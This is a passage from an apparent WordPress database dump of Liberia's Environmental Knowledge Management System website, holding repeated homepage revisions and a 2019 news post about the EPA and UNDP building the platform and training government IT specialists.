value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-300x151.jpg\" alt=\"Photo Credit: Dr. Kolleh Bangura. Coastal Erosion at Tropicana Beach, Paynesville, Liberia\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-26 08:02:03','2019-11-26 08:02:03','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2797,1,'2019-11-26 08:02:39','2019-11-26 08:02:39','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-300x151.jpg\" alt=\"Photo Credit: Dr. Kolleh Bangura. Coastal Erosion at Tropicana Beach, Paynesville, Liberia\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-26 08:02:39','2019-11-26 08:02:39','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2798,1,'2019-11-26 08:04:45','2019-11-26 08:04:45','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-300x151.jpg\" alt=\"Photo Credit: Dr. Kolleh Bangura. Coastal Erosion at Tropicana Beach, Paynesville, Liberia\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-26 08:04:45','2019-11-26 08:04:45','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2799,1,'2019-11-26 08:09:26','2019-11-26 08:09:26','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-300x151.jpg\" alt=\"Photo Credit: Dr. Kolleh Bangura. Coastal Erosion at Tropicana Beach, Paynesville, Liberia\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-26 08:09:26','2019-11-26 08:09:26','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2800,1,'2019-11-26 08:10:41','2019-11-26 08:10:41','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-300x151.jpg\" alt=\"Photo Credit: Dr. Kolleh Bangura. Coastal Erosion at Tropicana Beach, Paynesville, Liberia\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-26 08:10:41','2019-11-26 08:10:41','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2801,1,'2019-11-26 16:39:51','2019-11-26 16:39:51','<p><!--StartFragment--></p>\n\n<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) and the United Nations Development Program (UNDP) have built a platform to hold all environmental data and information aimed at enhancing Liberia’s development processes and have begun training information technology specialists from line government ministries and agencies about the system.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS), which\nis yet to be launched is a multi-year, cross-sectoral engagement that supports\ncollaboration among Government staff, research centers, think tanks,\npractitioners, and private firms in tackling global environmental challenges.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It was built under the Cross-Cutting Capacity Development (CCCD) Project which seeks to enable Liberia to make better decisions to meet and sustain global environmental obligations and strengthens a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities.&nbsp; </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, the EPA and UNDP on Monday, 18 November 2019 began a five day ‘learning-by-doing training’ in Buchanan, Grand Bassa County to use the EKMS, to demonstrate its value at improving a more holistic and resilient construct of the selected sectoral plan in keeping with Rio Convention obligations, is among many others expected to provide understanding on what environmental knowledge is and how to validate data information and knowledge and as well as increase institutions\' benefits with an effective knowledge management strategy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The\ntraining would also focus on the typology of information and knowledge,\nidentification of information and knowledge needs, and the acquisition,\ndiscovery, storage, organization, sharing, use and application of information\nin the organizational context in digital environment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Aaron\nWesseh, Head of the CCCD Project said the project is in line with the GEF-6\nCCCD strategy objectives 1, 3, and 5 which call for countries to integrate\nglobal environmental needs into management information systems and monitoring,\nintegrate Multilateral Environmental Agreements provisions into national\npolicy, legislative and regulatory frameworks and update National Capacity\nSelf-Assessment respectively.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Wesseh said at the opening of the training that the project will help Liberia to make better decisions to meet and sustain global environmental obligations including biodiversity, climate change, and desertification.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to\nhim, Liberia must have the capacity to coordinate efforts, as well as best\npractices for integrating global environmental priorities into planning,\ndecision-making, and reporting processes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The CCCD Project, Mr. Wesseh noted, is being carried out via four linked components as means to achieve the goal and objective including the development of an integrated Environmental Knowledge Management System (EKMS), enhancement of institutional and technical capacities for mainstreaming, developing, and utilizing policies and or legislative frameworks for effective implementations of the three RIO Conventions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Kolleh\nBangura, Chief Technical Adviser to the CCCD Project welcomed participants drawn\nfrom institutions involved with natural resource management and said the\nproject is being sponsored by the Global Environment Facility (GEF).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He applauded the CCCD Project Manager and the consultants for making the construction of the platform successful.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Bangura\nhopes that the IT Specialists brought environmental data from their\ninstitutions to be loaded to the platform and stressed the need to have all\nenvironmental data in one place.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking on behalf of EPA Deputy Director, Randall M. Dobayou, Tennema Coleman of Intersectorial thanked the participants and called on them to remain focus during the five-day. &nbsp; </p>\n<!-- /wp:paragraph -->\n\n<p><!--EndFragment--></p>','EPA, UNDP Built System To Hold Environmental Data','','publish','open','open','','epa-undp-built-system-to-hold-environmental-data','','','2019-12-04 08:03:51','2019-12-04 08:03:51','',0,'https://ekmsliberia.info/?p=2801',207,'post','',0),(2803,1,'2019-11-26 16:39:51','2019-11-26 16:39:51','<p><br>\n<br>\n<!--StartFragment--></p>\n\n<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) and the United Nations Development Program (UNDP) have built a platform to hold all environmental data and information aimed at enhancing Liberia’s development processes and have begun training information technology specialists from line government ministries and agencies about the system.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS), which\nis yet to be launched is a multi-year, cross-sectoral engagement that supports\ncollaboration among Government staff, research centers, think tanks,\npractitioners, and private firms in tackling global environmental challenges.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It was built under the Cross-Cutting Capacity Development (CCCD) Project which seeks to enable Liberia to make better decisions to meet and sustain global environmental obligations and strengthens a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities.&nbsp; </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, the EPA and UNDP on Monday, 18 November 2019 began a five day ‘learning-by-doing training’ in Buchanan, Grand Bassa County to use the EKMS, to demonstrate 